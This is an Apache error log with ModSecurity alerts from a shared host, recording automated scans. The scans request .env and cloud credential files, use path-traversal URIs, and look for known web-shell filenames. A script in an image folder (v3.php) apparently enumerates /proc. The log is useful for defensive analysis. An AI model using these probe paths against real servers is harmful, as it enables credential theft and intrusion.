[Mon May 11 23:18:59.103265 2026] [security2:error] [pid 1605480:tid 1605539] [client 47.128.46.8:47744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJHwh2Cvzd_nyNfUm8QJQAAARE"]
PHP Warning:  filesize(): stat failed for /proc/591/task/591/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/591/task/591/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/591/task/591/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/591/task/591/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/591/task/591/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/591/task/591/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 23:20:11.870338 2026] [authz_core:error] [pid 1606352:tid 1606425] [client 20.9.31.235:10282] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/l10n/error_log
[Mon May 11 23:20:12.123770 2026] [access_compat:error] [pid 1606352:tid 1606425] [client 20.9.31.235:10282] AH01797: client denied by server configuration: /home/krakouka/public_html/wp-content/uploads/wp-statistics/
PHP Warning:  filesize(): stat failed for /proc/201/task/201/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/201/task/201/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/201/task/201/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/201/task/201/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/201/task/201/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/201/task/201/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 23:20:12.750783 2026] [security2:error] [pid 1630927:tid 1630930] [client 216.73.216.110:36928] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425464283/images/Thumbs.db"] [unique_id "agJIDGiGYYhUwDaJINme1AAAAUA"]
[Mon May 11 23:20:12.751513 2026] [security2:error] [pid 1630927:tid 1630930] [client 216.73.216.110:36928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425464283/images/Thumbs.db"] [unique_id "agJIDGiGYYhUwDaJINme1AAAAUA"]
[Mon May 11 23:20:12.844763 2026] [security2:error] [pid 1630927:tid 1630930] [client 216.73.216.110:36928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJIDGiGYYhUwDaJINme1AAAAUA"]
PHP Warning:  filesize(): stat failed for /proc/108/task/108/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/108/task/108/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/108/task/108/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/108/task/108/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/108/task/108/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/108/task/108/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 23:20:15.951763 2026] [ssl:error] [pid 1601130:tid 1601173] (EAI 2)Name or service not known: [client 164.90.168.80:38866] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:15.951823 2026] [ssl:error] [pid 1601130:tid 1601173] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:19.044420 2026] [security2:error] [pid 1630927:tid 1630933] [client 43.159.62.163:35634] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/downloads/APOE-PREVISIONNEL-2018-2019.pdf"] [unique_id "agJIE2iGYYhUwDaJINme2QAAAUM"]
[Mon May 11 23:20:20.645129 2026] [ssl:error] [pid 1605480:tid 1605532] (EAI 2)Name or service not known: [client 193.169.9.60:38927] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:20.645188 2026] [ssl:error] [pid 1605480:tid 1605532] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:23.322188 2026] [ssl:error] [pid 1630927:tid 1630945] (EAI 2)Name or service not known: [client 66.132.172.104:59958] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:20:23.322248 2026] [ssl:error] [pid 1630927:tid 1630945] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:26.471306 2026] [ssl:error] [pid 1588898:tid 1588917] (EAI 2)Name or service not known: [client 66.132.172.104:59984] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:20:26.471356 2026] [ssl:error] [pid 1588898:tid 1588917] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:26.615261 2026] [authz_core:error] [pid 1606352:tid 1606433] [client 216.73.216.110:6235] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/ZF2/error_log
[Mon May 11 23:20:26.974828 2026] [ssl:error] [pid 1606352:tid 1606432] (EAI 2)Name or service not known: [client 70.34.196.146:37484] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:26.974871 2026] [ssl:error] [pid 1606352:tid 1606432] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:27.683218 2026] [security2:error] [pid 1601130:tid 1601172] [client 43.165.186.188:45256] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/emplois-daujourdhui-et-de-demain/"] [unique_id "agJIG3EgAO_835W6c1moHAAAAFY"]
[Mon May 11 23:20:28.071866 2026] [security2:error] [pid 1605480:tid 1605539] [client 216.73.216.110:45015] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:rename. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_logout found within ARGS:rename: .bash_logout"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agJIHB2Cvzd_nyNfUm8RMgAAARE"]
[Mon May 11 23:20:28.072983 2026] [security2:error] [pid 1605480:tid 1605539] [client 216.73.216.110:45015] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agJIHB2Cvzd_nyNfUm8RMgAAARE"]
[Mon May 11 23:20:28.132267 2026] [security2:error] [pid 1605480:tid 1605539] [client 216.73.216.110:45015] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJIHB2Cvzd_nyNfUm8RMgAAARE"]
[Mon May 11 23:20:29.642554 2026] [ssl:error] [pid 1588898:tid 1588908] (EAI 2)Name or service not known: [client 188.212.142.121:46073] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:29.642594 2026] [ssl:error] [pid 1588898:tid 1588908] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:31.610309 2026] [ssl:error] [pid 1630927:tid 1630953] (EAI 2)Name or service not known: [client 66.132.172.104:60000] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:20:31.610351 2026] [ssl:error] [pid 1630927:tid 1630953] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:35.903784 2026] [ssl:error] [pid 1605480:tid 1605530] (EAI 2)Name or service not known: [client 66.132.172.104:32718] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:20:35.903820 2026] [ssl:error] [pid 1605480:tid 1605530] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:35.940543 2026] [ssl:error] [pid 1606352:tid 1606426] (EAI 2)Name or service not known: [client 159.89.10.29:41960] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:35.940580 2026] [ssl:error] [pid 1606352:tid 1606426] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:37.700567 2026] [ssl:error] [pid 1630927:tid 1630942] (EAI 2)Name or service not known: [client 66.132.172.104:32728] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:20:37.700600 2026] [ssl:error] [pid 1630927:tid 1630942] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:38.609166 2026] [ssl:error] [pid 1605480:tid 1605529] (EAI 2)Name or service not known: [client 212.70.10.45:45033] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:38.609216 2026] [ssl:error] [pid 1605480:tid 1605529] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:40.818561 2026] [ssl:error] [pid 1605480:tid 1605534] (EAI 2)Name or service not known: [client 91.108.203.234:38931] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:40.818601 2026] [ssl:error] [pid 1605480:tid 1605534] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:42.033023 2026] [ssl:error] [pid 1630927:tid 1630948] (EAI 2)Name or service not known: [client 177.240.120.37:39524] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:42.033056 2026] [ssl:error] [pid 1630927:tid 1630948] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:46.831643 2026] [ssl:error] [pid 1630927:tid 1630943] (EAI 2)Name or service not known: [client 165.22.73.35:52656] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:46.831692 2026] [ssl:error] [pid 1630927:tid 1630943] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:47.463346 2026] [ssl:error] [pid 1605480:tid 1605528] (EAI 2)Name or service not known: [client 95.214.101.15:45757] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:47.463381 2026] [ssl:error] [pid 1605480:tid 1605528] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:49.420928 2026] [ssl:error] [pid 1606352:tid 1606427] (EAI 2)Name or service not known: [client 168.158.209.109:35065] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:49.420963 2026] [ssl:error] [pid 1606352:tid 1606427] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:50.061148 2026] [ssl:error] [pid 1630927:tid 1630945] (EAI 2)Name or service not known: [client 47.58.103.27:51336] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:20:50.061216 2026] [ssl:error] [pid 1630927:tid 1630945] AH01941: stapling_renew_response: responder error
[Mon May 11 23:20:53.416489 2026] [:error] [pid 1588898:tid 1588903] [client 51.68.111.205:35437] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 23:20:54.884289 2026] [security2:error] [pid 1605480:tid 1605544] [client 43.134.114.37:41640] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJINh2Cvzd_nyNfUm8RPQAAARY"]
[Mon May 11 23:20:56.294920 2026] [authz_core:error] [pid 1606352:tid 1606425] [client 20.9.31.235:10282] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/block-bindings/error_log
[Mon May 11 23:20:58.567963 2026] [security2:error] [pid 1588898:tid 1588913] [client 43.159.138.217:53986] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJIOqFW67LJTsgN3jQfAgAAAA4"]
[Mon May 11 23:21:23.248767 2026] [:error] [pid 1590352:tid 1590402] [client 47.128.120.112:50488] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 23:21:34.872059 2026] [proxy_http:error] [pid 1605480:tid 1605526] (20014)Internal error (specific information not available): [client 208.84.101.154:23234] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:21:34.871746 2026] [proxy_http:error] [pid 1606352:tid 1606433] (20014)Internal error (specific information not available): [client 208.84.101.154:23244] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:21:34.872129 2026] [proxy:error] [pid 1605480:tid 1605526] [client 208.84.101.154:23234] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/credentials.json
[Mon May 11 23:21:34.872180 2026] [proxy:error] [pid 1606352:tid 1606433] [client 208.84.101.154:23244] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/serviceAccountKey.json
[Mon May 11 23:21:34.892437 2026] [proxy_http:error] [pid 1601130:tid 1601170] (20014)Internal error (specific information not available): [client 208.84.101.154:23198] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:21:34.892465 2026] [proxy:error] [pid 1601130:tid 1601170] [client 208.84.101.154:23198] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.aws/credentials
[Mon May 11 23:21:34.911394 2026] [proxy_http:error] [pid 1588898:tid 1588903] (20014)Internal error (specific information not available): [client 208.84.101.154:23184] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:21:34.911496 2026] [proxy:error] [pid 1588898:tid 1588903] [client 208.84.101.154:23184] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env
[Mon May 11 23:22:10.329820 2026] [authz_core:error] [pid 1590352:tid 1590397] [client 47.128.125.42:20586] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/Core32/error_log
[Mon May 11 23:22:43.227299 2026] [proxy_http:error] [pid 1601130:tid 1601168] (20014)Internal error (specific information not available): [client 93.123.109.163:45494] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.228887 2026] [proxy:error] [pid 1601130:tid 1601168] [client 93.123.109.163:45494] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.production.local
[Mon May 11 23:22:43.228894 2026] [proxy_http:error] [pid 1588898:tid 1589210] (20014)Internal error (specific information not available): [client 93.123.109.163:45438] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.229606 2026] [proxy:error] [pid 1588898:tid 1589210] [client 93.123.109.163:45438] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/backend/.env
[Mon May 11 23:22:43.238804 2026] [proxy_http:error] [pid 1601130:tid 1601168] (20014)Internal error (specific information not available): [client 93.123.109.163:45494] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.238826 2026] [proxy:error] [pid 1601130:tid 1601168] [client 93.123.109.163:45494] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/502.shtml
[Mon May 11 23:22:43.245213 2026] [core:error] [pid 1588898:tid 1588915] [client 93.123.109.163:45512] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 23:22:43.246923 2026] [proxy_http:error] [pid 1605480:tid 1605529] (20014)Internal error (specific information not available): [client 93.123.109.163:45508] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.247065 2026] [proxy:error] [pid 1605480:tid 1605529] [client 93.123.109.163:45508] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env
[Mon May 11 23:22:43.250877 2026] [proxy_http:error] [pid 1630927:tid 1630942] (20014)Internal error (specific information not available): [client 93.123.109.163:45516] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.251191 2026] [proxy:error] [pid 1630927:tid 1630942] [client 93.123.109.163:45516] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env
[Mon May 11 23:22:43.268985 2026] [proxy_http:error] [pid 1606352:tid 1606425] (20014)Internal error (specific information not available): [client 93.123.109.163:45436] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.269406 2026] [proxy:error] [pid 1606352:tid 1606425] [client 93.123.109.163:45436] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/storage/.env
[Mon May 11 23:22:43.298933 2026] [core:error] [pid 1606352:tid 1606422] [client 93.123.109.163:45484] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Mon May 11 23:22:43.307070 2026] [proxy_http:error] [pid 1601130:tid 1601158] (20014)Internal error (specific information not available): [client 93.123.109.163:45426] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.649956 2026] [proxy_http:error] [pid 1605480:tid 1605529] (20014)Internal error (specific information not available): [client 93.123.109.163:45508] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.649983 2026] [proxy:error] [pid 1605480:tid 1605529] [client 93.123.109.163:45508] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/502.shtml
[Mon May 11 23:22:43.659044 2026] [proxy_http:error] [pid 1588898:tid 1589210] (20014)Internal error (specific information not available): [client 93.123.109.163:45438] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.661617 2026] [proxy_http:error] [pid 1630927:tid 1630947] (20014)Internal error (specific information not available): [client 93.123.109.163:45498] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.668352 2026] [proxy_http:error] [pid 1605480:tid 1605530] (20014)Internal error (specific information not available): [client 93.123.109.163:45496] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.682546 2026] [core:error] [pid 1590352:tid 1590405] [client 93.123.109.163:45486] AH10244: invalid URI path (/../.env)
[Mon May 11 23:22:43.684987 2026] [proxy_http:error] [pid 1590352:tid 1590412] (20014)Internal error (specific information not available): [client 93.123.109.163:45466] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.700281 2026] [proxy_http:error] [pid 1601130:tid 1601168] (20014)Internal error (specific information not available): [client 93.123.109.163:45494] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.711577 2026] [proxy_http:error] [pid 1590352:tid 1590393] (20014)Internal error (specific information not available): [client 93.123.109.163:45396] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.712510 2026] [proxy_http:error] [pid 1605480:tid 1605529] (20014)Internal error (specific information not available): [client 93.123.109.163:45508] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:22:43.738928 2026] [proxy_http:error] [pid 1605480:tid 1605536] (20014)Internal error (specific information not available): [client 93.123.109.163:45406] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 23:23:10.679513 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/text.php
[Mon May 11 23:23:10.856330 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/wp-themes.php
[Mon May 11 23:23:11.050490 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/eubrzjghnc.php
[Mon May 11 23:23:11.208097 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/images.php
[Mon May 11 23:23:11.525110 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/b0.php
[Mon May 11 23:23:11.714108 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/gif.php
[Mon May 11 23:23:12.029551 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/bgymj.php
[Mon May 11 23:23:12.187407 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/03a005685d.php
[Mon May 11 23:23:13.007745 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/alfanew2.php7
[Mon May 11 23:23:13.324139 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/vuln.php
[Mon May 11 23:23:13.642061 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/default.php
[Mon May 11 23:23:13.800215 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/wp-sigunq.php
[Mon May 11 23:23:14.310892 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/xleet.php
[Mon May 11 23:23:14.469633 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/ayk.php
[Mon May 11 23:23:14.627327 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/index1.php
[Mon May 11 23:23:15.135989 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/mani.php
[Mon May 11 23:23:15.457510 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/admin-post.php
[Mon May 11 23:23:15.616497 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/01.php
[Mon May 11 23:23:15.778023 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/pki-validation.php
[Mon May 11 23:23:16.258643 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/api.php
[Mon May 11 23:23:16.765111 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/tools.php
[Mon May 11 23:23:17.105762 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/room.php
[Mon May 11 23:23:17.421332 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/file.php
[Mon May 11 23:23:17.894536 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/lv.php
[Mon May 11 23:23:18.525165 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/sim.php
[Mon May 11 23:23:18.699647 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/zezrtidups.php
[Mon May 11 23:23:19.199612 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/gel4y.php
[Mon May 11 23:23:19.357487 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/wp-cli.php
[Mon May 11 23:23:19.516069 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/xwpg.php
[Mon May 11 23:23:19.831291 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/disoxrmons.php
[Mon May 11 23:23:20.333186 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/xmrlpc.php
[Mon May 11 23:23:20.806278 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10439] File does not exist: /home/ofcrysta/public_html/sadcut1.php
